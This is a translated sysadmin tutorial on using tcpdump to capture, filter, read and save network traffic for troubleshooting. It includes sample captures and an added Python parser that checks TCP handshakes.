

    Original: 君子蘭    Translation: 云技術實踐



    A flexible, powerful command-line tool that eases the pain of network troubleshooting.

    In my experience as a sysadmin, I have often found network connectivity issues hard to troubleshoot. For those situations, tcpdump is a great friend.

    Tcpdump is a command-line utility that lets you capture and analyze network traffic going through your system. It is often used to help troubleshoot network issues, and also as a security tool.

    Tcpdump is a powerful and versatile tool with many options and filters, and it can be used in a wide variety of situations. Since it is a command-line tool, it is ideal for running on remote servers or devices that have no GUI, collecting data that can be analyzed later. It can also be launched in the background or as a scheduled job using tools like cron.

    In this article, we will look at some of tcpdump's most common features.

    1. Installing on Linux

    Tcpdump ships with several Linux distributions, so chances are it is already installed. Check whether tcpdump is installed on your system with the following command:

    $ which tcpdump

    /usr/sbin/tcpdump

    If tcpdump is not installed, you can install it with your distribution's package manager. For example, on CentOS or Red Hat Enterprise Linux:

    $ sudo yum install -y tcpdump

    Tcpdump requires libpcap, a library for network packet capture. If it is not installed, it will be added automatically as a dependency.

    You are now ready to start capturing packets.

    2. Capturing packets with tcpdump

    To capture packets for troubleshooting or analysis, tcpdump needs elevated privileges, so most commands in the examples below are prefixed with sudo. If you would rather not hand out full root on a shared machine, the binary can be granted just the cap_net_raw and cap_net_admin capabilities with setcap instead; note also that many distributions build tcpdump to drop to an unprivileged user (the -Z option) once the capture device is open.

    First, use the command tcpdump -D to see which interfaces are available for capture:

    $ sudo tcpdump -D

    1.eth0

    2.virbr0

    3.eth1

    4.any (Pseudo-device that captures on all interfaces)

    5.lo [Loopback]

    The example above lists all interfaces available on my machine. The special interface any captures on every active interface.

    Let's start capturing some packets. Capture all packets on any interface by running this command:

    $ sudo tcpdump -i any

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    09:56:18.293641 IP rhel75.localdomain.ssh > 192.168.64.1.56322: Flags [P.], seq 3770820720:3770820916, ack 3503648727, win 309, options [nop,nop,TS val 76577898 ecr 510770929], length 196

    09:56:18.293794 IP 192.168.64.1.56322 > rhel75.localdomain.ssh: Flags [.], ack 196, win 391, options [nop,nop,TS val 510771017 ecr 76577898], length 0

    09:56:18.295058 IP rhel75.59883 > gateway.domain: 2486+ PTR? 1.64.168.192.in-addr.arpa. (43)

    09:56:18.310225 IP gateway.domain > rhel75.59883: 2486 NXDomain* 0/1/0 (102)

    09:56:18.312482 IP rhel75.49685 > gateway.domain: 34242+ PTR? 28.64.168.192.in-addr.arpa. (44)

    09:56:18.322425 IP gateway.domain > rhel75.49685: 34242 NXDomain* 0/1/0 (103)

    09:56:18.323164 IP rhel75.56631 > gateway.domain: 29904+ PTR? 1.122.168.192.in-addr.arpa. (44)

    09:56:18.323342 IP rhel75.localdomain.ssh > 192.168.64.1.56322: Flags [P.], seq 196:584, ack 1, win 309, options [nop,nop,TS val 76577928 ecr 510771017], length 388

    09:56:18.323563 IP 192.168.64.1.56322 > rhel75.localdomain.ssh: Flags [.], ack 584, win 411, options [nop,nop,TS val 510771047 ecr 76577928], length 0

    09:56:18.335569 IP gateway.domain > rhel75.56631: 29904 NXDomain* 0/1/0 (103)

    09:56:18.336429 IP rhel75.44007 > gateway.domain: 61677+ PTR? 98.122.168.192.in-addr.arpa. (45)

    09:56:18.336655 IP gateway.domain > rhel75.44007: 61677* 1/0/0 PTR rhel75. (65)

    09:56:18.337177 IP rhel75.localdomain.ssh > 192.168.64.1.56322: Flags [P.], seq 584:1644, ack 1, win 309, options [nop,nop,TS val 76577942 ecr 510771047], length 1060

    ---- SKIPPING LONG OUTPUT -----

    09:56:19.342939 IP 192.168.64.1.56322 > rhel75.localdomain.ssh: Flags [.], ack 1752016, win 1444, options [nop,nop,TS val 510772067 ecr 76578948], length 0

    ^C

    9003 packets captured

    9010 packets received by filter

    7 packets dropped by kernel

    $

    Tcpdump keeps capturing packets until it receives an interrupt signal; press Ctrl+C to stop it. As this example shows, tcpdump captured more than 9,000 packets. In this case, because I am connected to this server over ssh, tcpdump captured all of that traffic as well. Also read the counters at the end: a non-zero "packets dropped by kernel" means the capture missed traffic and is not a complete record. To limit the number of packets captured and stop tcpdump, use the -c (count) option:

    $ sudo tcpdump -i any -c 5

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    11:21:30.242740 IP rhel75.localdomain.ssh > 192.168.64.1.56322: Flags [P.], seq 3772575680:3772575876, ack 3503651743, win 309, options [nop,nop,TS val 81689848 ecr 515883153], length 196

    11:21:30.242906 IP 192.168.64.1.56322 > rhel75.localdomain.ssh: Flags [.], ack 196, win 1443, options [nop,nop,TS val 515883235 ecr 81689848], length 0

    11:21:30.244442 IP rhel75.43634 > gateway.domain: 57680+ PTR? 1.64.168.192.in-addr.arpa. (43)

    11:21:30.244829 IP gateway.domain > rhel75.43634: 57680 NXDomain 0/0/0 (43)

    11:21:30.247048 IP rhel75.33696 > gateway.domain: 37429+ PTR? 28.64.168.192.in-addr.arpa. (44)

    5 packets captured

    12 packets received by filter

    0 packets dropped by kernel

    $

    In this case, tcpdump stopped automatically after capturing five packets. This is useful in several scenarios, for instance when troubleshooting connectivity where capturing the first few packets is enough. It is even more useful combined with filters that capture specific packets (shown below).

    By default, tcpdump resolves IP addresses and ports into names, as shown in the previous example. When troubleshooting network issues, it is usually easier to work with IP addresses and port numbers: disable name resolution with -n, and both name and port resolution with -nn:

    $ sudo tcpdump -i any -c5 -nn

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    23:56:24.292206 IP 192.168.64.28.22 > 192.168.64.1.35110: Flags [P.], seq 166198580:166198776, ack 2414541257, win 309, options [nop,nop,TS val 615664 ecr 540031155], length 196

    23:56:24.292357 IP 192.168.64.1.35110 > 192.168.64.28.22: Flags [.], ack 196, win 1377, options [nop,nop,TS val 540031229 ecr 615664], length 0

    23:56:24.292570 IP 192.168.64.28.22 > 192.168.64.1.35110: Flags [P.], seq 196:568, ack 1, win 309, options [nop,nop,TS val 615664 ecr 540031229], length 372

    23:56:24.292655 IP 192.168.64.1.35110 > 192.168.64.28.22: Flags [.], ack 568, win 1400, options [nop,nop,TS val 540031229 ecr 615664], length 0

    23:56:24.292752 IP 192.168.64.28.22 > 192.168.64.1.35110: Flags [P.], seq 568:908, ack 1, win 309, options [nop,nop,TS val 615664 ecr 540031229], length 340

    5 packets captured

    6 packets received by filter

    0 packets dropped by kernel

    As shown above, the capture output now displays IP addresses and port numbers. This also stops tcpdump from issuing DNS lookups of its own, which lowers network traffic while troubleshooting and avoids telling your resolver which addresses you are investigating.

    Now that you can capture network packets, let's explore what this output means.

    3. Understanding the output format

    Tcpdump can capture and decode many different protocols, such as TCP, UDP, ICMP and many more. While we cannot cover all of them here, let's explore TCP packets to help you get started. More details about the formats of the different protocols can be found in the tcpdump man page. A typical TCP packet captured by tcpdump looks like this:

    08:41:13.729687 IP 192.168.64.28.22 > 192.168.64.1.41916: Flags [P.], seq 196:568, ack 1, win 309, options [nop,nop,TS val 117964079 ecr 816509256], length 372

    The fields may vary depending on the type of packet being sent, but this is the general format.

    The first field, 08:41:13.729687, is the timestamp of the received packet according to the local clock.

    Next, IP is the network-layer protocol, in this case IPv4. For IPv6 packets the value is IP6.

    The next field, 192.168.64.28.22, is the source IP address and port. This is followed by the destination IP address and port, 192.168.64.1.41916.

    After the source and destination come the TCP flags, [P.]. Typical values for this field are:

    Value   Flag type   Description
    S       SYN         Connection start
    F       FIN         Connection finish
    P       PUSH        Data push
    R       RST         Connection reset
    .       ACK         Acknowledgment

    The field can also be a combination of these values, for example [S.] for a SYN-ACK packet.

    Next is the sequence number of the data contained in the packet. For the first packet captured, this is an absolute number; subsequent packets use relative numbers to make them easier to follow (pass -S if you need absolute sequence numbers throughout). In this example the sequence is seq 196:568, meaning the packet carries bytes 196 up to but not including 568 of this flow, 372 bytes in total.

    This is followed by the Ack number, ack 1. In this case it is 1 because this is the side sending data. For the side receiving the data, this field represents the next expected byte (of data) on this flow. For example, the Ack number for the next packet in this flow would be 568.

    The next field is the window size, win 309, which represents the number of bytes available in the receiving buffer, followed by TCP options such as MSS (Maximum Segment Size) or Window Scale. Note that tcpdump prints the raw 16-bit window value; once a window scale has been negotiated in the handshake, the real window is that value shifted left by the scale factor. For details on TCP protocol options, consult Transmission Control Protocol (TCP) Parameters.

    Finally, we have the packet length, length 372, which is the length of the payload data in bytes. It equals the difference between the last and first byte of the sequence range.
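    The format just described is regular enough to parse, which is what you want when a capture has thousands of lines. The following Python is an added example, not code from the original article or from the tcpdump project: it parses tcpdump's default one-line TCP output into fields, checks that the seq range agrees with the length, and tracks each three-way handshake so that connections which never got a SYN-ACK stand out. It assumes the default, non-verbose output format shown on this page; the sample lines are copied from the capture above except for one constructed SYN to 203.0.113.5.

```python
import re
from collections import defaultdict

# Added example, not code from the original article: a parser for the one-line TCP
# format tcpdump prints (as dissected above), a check that "seq first:last" agrees
# with "length", and a small tracker that tells you how far each three-way handshake
# got, which is the first thing to look at when a connection "does not work".
# Assumes tcpdump's default (non -v) output as shown on this page.

TCP_LINE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) (?P<proto>IP6?) "
    r"(?P<src>\S+)\.(?P<sport>[^\s.]+) > (?P<dst>\S+)\.(?P<dport>[^\s.:]+): "
    r"Flags \[(?P<flags>[^\]]*)\]"
    r"(?:, seq (?P<seq>\d+(?::\d+)?))?"
    r"(?:, ack (?P<ack>\d+))?"
    r"(?:, win (?P<win>\d+))?"
    r"(?:, options \[(?P<options>[^\]]*)\])?"
    r", length (?P<length>\d+)"
    r"(?::\s*(?P<payload>.*))?$"
)

# Flag letters as tcpdump prints them; the table above lists the first five.
FLAG_NAMES = {"S": "SYN", "F": "FIN", "P": "PSH", "R": "RST", ".": "ACK",
              "U": "URG", "E": "ECE", "W": "CWR"}


def decode_flags(text):
    """'S.' -> {'SYN', 'ACK'}; unknown letters are kept as-is."""
    return {FLAG_NAMES.get(c, c) for c in text}


def parse_tcp_line(line):
    """Return a dict of fields for one TCP line, or None for any other line (DNS, ICMP...)."""
    m = TCP_LINE.match(line.strip())
    if not m:
        return None
    seq = m.group("seq")
    if seq is None:                      # pure ACK: tcpdump prints no seq
        first = last = None
    elif ":" in seq:                     # data segment: first:last, last exclusive
        first, last = (int(x) for x in seq.split(":"))
    else:                                # SYN / empty segment: a single number
        first = last = int(seq)
    return {
        "ts": m.group("ts"), "proto": m.group("proto"),
        "src": m.group("src"), "sport": m.group("sport"),
        "dst": m.group("dst"), "dport": m.group("dport"),
        "flags": decode_flags(m.group("flags")),
        "seq_first": first, "seq_last": last,
        "ack": int(m.group("ack")) if m.group("ack") else None,
        "win": int(m.group("win")) if m.group("win") else None,
        "options": m.group("options"),
        "length": int(m.group("length")),
        "payload": m.group("payload"),
    }


def seq_matches_length(rec):
    """last - first must equal the payload length (372 = 568 - 196 in the example above)."""
    if rec["seq_first"] is None:
        return rec["length"] == 0
    return rec["seq_last"] - rec["seq_first"] == rec["length"]


def handshake_status(records):
    """Per client->server 4-tuple, report whether the SYN, SYN-ACK, ACK exchange completed."""
    steps = defaultdict(set)
    for r in records:
        fwd = (r["src"], r["sport"], r["dst"], r["dport"])
        if "SYN" in r["flags"] and "ACK" not in r["flags"]:
            steps[fwd].add("SYN")
        elif "SYN" in r["flags"]:                        # SYN-ACK travels server->client
            steps[(r["dst"], r["dport"], r["src"], r["sport"])].add("SYN-ACK")
        elif "ACK" in r["flags"] and "SYN-ACK" in steps.get(fwd, ()):
            steps[fwd].add("ACK")
    status = {}
    for key, seen in steps.items():
        if "SYN-ACK" in seen and "ACK" in seen:
            status[key] = "established"
        elif "SYN-ACK" in seen:
            status[key] = "syn-ack seen, no final ack"
        else:
            status[key] = "syn sent, no reply"   # filtered, unroutable, or nothing listening
    return status


# Four lines copied from the "host 54.204.39.132" capture above, plus one constructed
# SYN (to 203.0.113.5, a documentation address) that never gets an answer.
SAMPLE_LINES = [
    "09:54:20.042023 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [S], seq 1375157070, win 29200, options [mss 1460,sackOK,TS val 122350391 ecr 0,nop,wscale 7], length 0",
    "09:54:20.088127 IP 54.204.39.132.80 > 192.168.122.98.39326: Flags [S.], seq 1935542841, ack 1375157071, win 28960, options [mss 1460,sackOK,TS val 522713542 ecr 122350391,nop,wscale 9], length 0",
    "09:54:20.088204 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 122350437 ecr 522713542], length 0",
    "09:54:20.088734 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 122350438 ecr 522713542], length 112: HTTP: GET / HTTP/1.1",
    "09:54:25.000000 IP 192.168.122.98.40000 > 203.0.113.5.443: Flags [S], seq 1, win 29200, options [mss 1460], length 0",
]

if __name__ == "__main__":
    records = [r for r in map(parse_tcp_line, SAMPLE_LINES) if r]
    for r in records:
        print(r["ts"], sorted(r["flags"]), "seq ok" if seq_matches_length(r) else "SEQ/LENGTH MISMATCH")
    for conn, state in handshake_status(records).items():
        print("%s:%s -> %s:%s  %s" % (conn + (state,)))
```

    Feed it `tcpdump -nn` output (or `tcpdump -nn -r file.pcap`) line by line; lines for other protocols come back as None and can be skipped, and a connection reported as "syn sent, no reply" is the classic signature of a firewall or routing problem between the two hosts.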

    Now let's learn how to filter packets to narrow down the results and make it easier to troubleshoot specific issues.

    4. Filtering packets

    As mentioned above, tcpdump can capture too many packets, some of which are not even related to the issue you are troubleshooting. For example, if you are troubleshooting a connectivity issue with a web server, you are not interested in the SSH traffic, so removing the SSH packets from the output makes it easier to work on the real issue.

    One of tcpdump's most powerful features is its ability to filter the captured packets by a variety of parameters, such as source and destination IP addresses, ports, protocols and so on. Let's look at some of the most common ones.

    Protocol

    To filter packets by protocol, specify the protocol on the command line. For example, capture only ICMP packets with this command:

    $ sudo tcpdump -i any -c5 icmp

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    In a different terminal, try to ping another machine:

    $ ping opensource.com

    PING opensource.com (54.204.39.132) 56(84) bytes of data.

    64 bytes from ec2-54-204-39-132.compute-1.amazonaws.com (54.204.39.132): icmp_seq=1 ttl=47 time=39.6 ms

    Back in the tcpdump capture, notice that tcpdump captures and displays only the ICMP-related packets. In this case, it does not display the name-resolution packets that were generated when resolving the name opensource.com:

    09:34:20.136766 IP rhel75 > ec2-54-204-39-132.compute-1.amazonaws.com: ICMP echo request, id 20361, seq 1, length 64

    09:34:20.176402 IP ec2-54-204-39-132.compute-1.amazonaws.com > rhel75: ICMP echo reply, id 20361, seq 1, length 64

    09:34:21.140230 IP rhel75 > ec2-54-204-39-132.compute-1.amazonaws.com: ICMP echo request, id 20361, seq 2, length 64

    09:34:21.180020 IP ec2-54-204-39-132.compute-1.amazonaws.com > rhel75: ICMP echo reply, id 20361, seq 2, length 64

    09:34:22.141777 IP rhel75 > ec2-54-204-39-132.compute-1.amazonaws.com: ICMP echo request, id 20361, seq 3, length 64

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    Host

    Use the host filter to limit the capture to packets related to a specific host:

    $ sudo tcpdump -i any -c5 -nn host 54.204.39.132

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    09:54:20.042023 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [S], seq 1375157070, win 29200, options [mss 1460,sackOK,TS val 122350391 ecr 0,nop,wscale 7], length 0

    09:54:20.088127 IP 54.204.39.132.80 > 192.168.122.98.39326: Flags [S.], seq 1935542841, ack 1375157071, win 28960, options [mss 1460,sackOK,TS val 522713542 ecr 122350391,nop,wscale 9], length 0

    09:54:20.088204 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 122350437 ecr 522713542], length 0

    09:54:20.088734 IP 192.168.122.98.39326 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 122350438 ecr 522713542], length 112: HTTP: GET / HTTP/1.1

    09:54:20.129733 IP 54.204.39.132.80 > 192.168.122.98.39326: Flags [.], ack 113, win 57, options [nop,nop,TS val 522713552 ecr 122350438], length 0

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    In this example, tcpdump captures and displays only packets to and from host 54.204.39.132.

    Port

    To filter packets by the desired service or port, use the port filter. For example, capture packets related to the web (HTTP) service with this command:

    $ sudo tcpdump -i any -c5 -nn port 80

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    09:58:28.790548 IP 192.168.122.98.39330 > 54.204.39.132.80: Flags [S], seq 1745665159, win 29200, options [mss 1460,sackOK,TS val 122599140 ecr 0,nop,wscale 7], length 0

    09:58:28.834026 IP 54.204.39.132.80 > 192.168.122.98.39330: Flags [S.], seq 4063583040, ack 1745665160, win 28960, options [mss 1460,sackOK,TS val 522775728 ecr 122599140,nop,wscale 9], length 0

    09:58:28.834093 IP 192.168.122.98.39330 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 122599183 ecr 522775728], length 0

    09:58:28.834588 IP 192.168.122.98.39330 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 122599184 ecr 522775728], length 112: HTTP: GET / HTTP/1.1

    09:58:28.878445 IP 54.204.39.132.80 > 192.168.122.98.39330: Flags [.], ack 113, win 57, options [nop,nop,TS val 522775739 ecr 122599184], length 0

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    Source and destination IP/hostname

    You can also filter packets by source or destination IP address or hostname. For example, to capture packets coming from host 192.168.122.98:

    $ sudo tcpdump -i any -c5 -nn src 192.168.122.98

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10:02:15.220824 IP 192.168.122.98.39436 > 192.168.122.1.53: 59332+ A? opensource.com. (32)

    10:02:15.220862 IP 192.168.122.98.39436 > 192.168.122.1.53: 20749+ AAAA? opensource.com. (32)

    10:02:15.364062 IP 192.168.122.98.39334 > 54.204.39.132.80: Flags [S], seq 1108640533, win 29200, options [mss 1460,sackOK,TS val 122825713 ecr 0,nop,wscale 7], length 0

    10:02:15.409229 IP 192.168.122.98.39334 > 54.204.39.132.80: Flags [.], ack 669337581, win 229, options [nop,nop,TS val 122825758 ecr 522832372], length 0

    10:02:15.409667 IP 192.168.122.98.39334 > 54.204.39.132.80: Flags [P.], seq 0:112, ack 1, win 229, options [nop,nop,TS val 122825759 ecr 522832372], length 112: HTTP: GET / HTTP/1.1

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    Notice that tcpdump captured packets with source IP address 192.168.122.98 for several services, such as name resolution (port 53) and HTTP (port 80). The response packets are not displayed because their source IP is different.

    Conversely, use the dst filter to select by destination IP/hostname:

    $ sudo tcpdump -i any -c5 -nn dst 192.168.122.98

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10:05:03.572931 IP 192.168.122.1.53 > 192.168.122.98.47049: 2248 1/0/0 A 54.204.39.132 (48)

    10:05:03.572944 IP 192.168.122.1.53 > 192.168.122.98.47049: 33770 0/0/0 (32)

    10:05:03.621833 IP 54.204.39.132.80 > 192.168.122.98.39338: Flags [S.], seq 3474204576, ack 3256851264, win 28960, options [mss 1460,sackOK,TS val 522874425 ecr 122993922,nop,wscale 9], length 0

    10:05:03.667767 IP 54.204.39.132.80 > 192.168.122.98.39338: Flags [.], ack 113, win 57, options [nop,nop,TS val 522874436 ecr 122993972], length 0

    10:05:03.672221 IP 54.204.39.132.80 > 192.168.122.98.39338: Flags [P.], seq 1:643, ack 113, win 57, options [nop,nop,TS val 522874437 ecr 122993972], length 642: HTTP: HTTP/1.1 302 Found

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    Complex expressions

    You can also combine filters with the logical operators and and or to build more complex expressions. For example, to select packets from source IP address 192.168.122.98 and the HTTP service only, use this command:

    $ sudo tcpdump -i any -c5 -nn src 192.168.122.98 and port 80

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10:08:00.472696 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [S], seq 2712685325, win 29200, options [mss 1460,sackOK,TS val 123170822 ecr 0,nop,wscale 7], length 0

    10:08:00.516118 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [.], ack 268723504, win 229, options [nop,nop,TS val 123170865 ecr 522918648], length 0

    10:08:00.516583 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [P.], seq 0:112, ack 1, win 229, options [nop,nop,TS val 123170866 ecr 522918648], length 112: HTTP: GET / HTTP/1.1

    10:08:00.567044 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [.], ack 643, win 239, options [nop,nop,TS val 123170916 ecr 522918661], length 0

    10:08:00.788153 IP 192.168.122.98.39342 > 54.204.39.132.80: Flags [F.], seq 112, ack 643, win 239, options [nop,nop,TS val 123171137 ecr 522918661], length 0

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    You can create more complex expressions by grouping filters with parentheses. In that case, enclose the whole filter expression in quotation marks so that the shell does not interpret the parentheses itself:

    $ sudo tcpdump -i any -c5 -nn "port 80 and (src 192.168.122.98 or src 54.204.39.132)"

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10:10:37.602214 IP 192.168.122.98.39346 > 54.204.39.132.80: Flags [S], seq 871108679, win 29200, options [mss 1460,sackOK,TS val 123327951 ecr 0,nop,wscale 7], length 0

    10:10:37.650651 IP 54.204.39.132.80 > 192.168.122.98.39346: Flags [S.], seq 854753193, ack 871108680, win 28960, options [mss 1460,sackOK,TS val 522957932 ecr 123327951,nop,wscale 9], length 0

    10:10:37.650708 IP 192.168.122.98.39346 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 123328000 ecr 522957932], length 0

    10:10:37.651097 IP 192.168.122.98.39346 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 123328000 ecr 522957932], length 112: HTTP: GET / HTTP/1.1

    10:10:37.692900 IP 54.204.39.132.80 > 192.168.122.98.39346: Flags [.], ack 113, win 57, options [nop,nop,TS val 522957942 ecr 123328000], length 0

    5 packets captured

    5 packets received by filter

    0 packets dropped by kernel

    In this example, we select only packets for the HTTP service (port 80) with source IP address 192.168.122.98 or 54.204.39.132. This is a quick way to examine both sides of the same flow.

    5. Inspecting packet contents

    In the previous examples we only checked the packet headers for information such as source, destination, ports and so on. Sometimes that is all you need to troubleshoot a connectivity issue. But sometimes we need to inspect the contents of a packet, to make sure the message we are sending contains what we need, or that we received the expected response. To see the packet contents, tcpdump offers two additional flags: -X prints the contents in hex and ASCII, -A prints them in ASCII only.

    For example, inspect the HTTP content of a web request like this:

    $ sudo tcpdump -i any -c10 -nn -A port 80

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

    listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    13:02:14.871803 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [S], seq 2546602048, win 29200, options [mss 1460,sackOK,TS val 133625221 ecr 0,nop,wscale 7], length 0

    E..<..@.@.....zb6.'....P...@......r............

    ............................

    13:02:14.910734 IP 54.204.39.132.80 > 192.168.122.98.39366: Flags [S.], seq 1877348646, ack 2546602049, win 28960, options [mss 1460,sackOK,TS val 525532247 ecr 133625221,nop,wscale 9], length 0

    E..<..@./..a6.'...zb.P..o..&...A..q a..........

    .R.W....... ................

    13:02:14.910832 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 133625260 ecr 525532247], length 0

    E..4..@.@.....zb6.'....P...Ao..'...........

    .....R.W................

    13:02:14.911808 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 133625261 ecr 525532247], length 112: HTTP: GET / HTTP/1.1

    E.....@.@..1..zb6.'....P...Ao..'...........

    .....R.WGET / HTTP/1.1

    User-Agent: Wget/1.14 (linux-gnu)

    Accept: */*

    Host: opensource.com

    Connection: Keep-Alive

    ................

    13:02:14.951199 IP 54.204.39.132.80 > 192.168.122.98.39366: Flags [.], ack 113, win 57, options [nop,nop,TS val 525532257 ecr 133625261], length 0

    E..4.F@./.."6.'...zb.P..o..'.......9.2.....

    .R.a....................

    13:02:14.955030 IP 54.204.39.132.80 > 192.168.122.98.39366: Flags [P.], seq 1:643, ack 113, win 57, options [nop,nop,TS val 525532258 ecr 133625261], length 642: HTTP: HTTP/1.1 302 Found

    E....G@./...6.'...zb.P..o..'.......9.......

    .R.b....HTTP/1.1 302 Found

    Server: nginx

    Date: Sun, 23 Sep 2018 17:02:14 GMT

    Content-Type: text/html; charset=iso-8859-1

    Content-Length: 207

    X-Content-Type-Options: nosniff

    Location: https://opensource.com/

    Cache-Control: max-age=1209600

    Expires: Sun, 07 Oct 2018 17:02:14 GMT

    X-Request-ID: v-6baa3acc-bf52-11e8-9195-22000ab8cf2d

    X-Varnish: 632951979

    Age: 0

    Via: 1.1 varnish (Varnish/5.2)

    X-Cache: MISS

    Connection: keep-alive

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

    <html><head>

    <title>302 Found</title>

    </head><body>

    <h1>Found</h1>

    <p>The document has moved <a >here</a>.</p>

    </body></html>

    ................

    13:02:14.955083 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [.], ack 643, win 239, options [nop,nop,TS val 133625304 ecr 525532258], length 0

    E..4..@.@.....zb6.'....P....o..............

    .....R.b................

    13:02:15.195524 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [F.], seq 113, ack 643, win 239, options [nop,nop,TS val 133625545 ecr 525532258], length 0

    E..4..@.@.....zb6.'....P....o..............

    .....R.b................

    13:02:15.236592 IP 54.204.39.132.80 > 192.168.122.98.39366: Flags [F.], seq 643, ack 114, win 57, options [nop,nop,TS val 525532329 ecr 133625545], length 0

    E..4.H@./.. 6.'...zb.P..o..........9.I.....

    .R......................

    13:02:15.236656 IP 192.168.122.98.39366 > 54.204.39.132.80: Flags [.], ack 644, win 239, options [nop,nop,TS val 133625586 ecr 525532329], length 0

    E..4..@.@.....zb6.'....P....o..............

    .....R..................

    10 packets captured

    10 packets received by filter

    0 packets dropped by kernel

    This is helpful for troubleshooting API calls, provided they use plain HTTP. For encrypted connections this output is far less useful. Keep in mind that payload captures like this one contain whatever the application sent, including credentials, session cookies and API tokens, so treat capture output and .pcap files as sensitive data.

    6. Saving captures to a file

    Another useful feature of tcpdump is the ability to save the capture to a file so you can analyze the results later. This lets you, for example, capture packets in batch mode overnight and verify the results in the morning. It also helps when there are too many packets to analyze as a live capture scrolls by too fast.

    To save packets to a file instead of displaying them on screen, use the -w option:

    $ sudo tcpdump -i any -c10 -nn -w webserver.pcap port 80

    [sudo] password for ricardo:

    tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes

    10 packets captured

    10 packets received by filter

    0 packets dropped by kernel

    This command saves the output to a file named webserver.pcap. The .pcap extension stands for "packet capture" and is the convention for this file format.

    As the example shows, nothing is displayed on screen, and the capture finishes after 10 packets because of the -c10 option. If you want some feedback to make sure packets are being captured, add the -v option, which prints a running count of captured packets.

    Tcpdump writes the file in a binary format, so you cannot simply open it with a text editor. To read the file's contents, run tcpdump with the -r option:

    $ tcpdump -nn -r webserver.pcap

    reading from file webserver.pcap, link-type LINUX_SLL (Linux cooked)

    13:36:57.679494 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [S], seq 3709732619, win 29200, options [mss 1460,sackOK,TS val 135708029 ecr 0,nop,wscale 7], length 0

    13:36:57.718932 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [S.], seq 1999298316, ack 3709732620, win 28960, options [mss 1460,sackOK,TS val 526052949 ecr 135708029,nop,wscale 9], length 0

    13:36:57.719005 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [.], ack 1, win 229, options [nop,nop,TS val 135708068 ecr 526052949], length 0

    13:36:57.719186 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [P.], seq 1:113, ack 1, win 229, options [nop,nop,TS val 135708068 ecr 526052949], length 112: HTTP: GET / HTTP/1.1

    13:36:57.756979 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [.], ack 113, win 57, options [nop,nop,TS val 526052959 ecr 135708068], length 0

    13:36:57.760122 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [P.], seq 1:643, ack 113, win 57, options [nop,nop,TS val 526052959 ecr 135708068], length 642: HTTP: HTTP/1.1 302 Found

    13:36:57.760182 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [.], ack 643, win 239, options [nop,nop,TS val 135708109 ecr 526052959], length 0

    13:36:57.977602 IP 192.168.122.98.39378 > 54.204.39.132.80: Flags [F.], seq 113, ack 643, win 239, options [nop,nop,TS val 135708327 ecr 526052959], length 0

    13:36:58.022089 IP 54.204.39.132.80 > 192.168.122.98.39378: Flags [F.], seq 643, ack 114, win 57, options [nop,nop,TS val 526053025 ecr 135708327], length 0

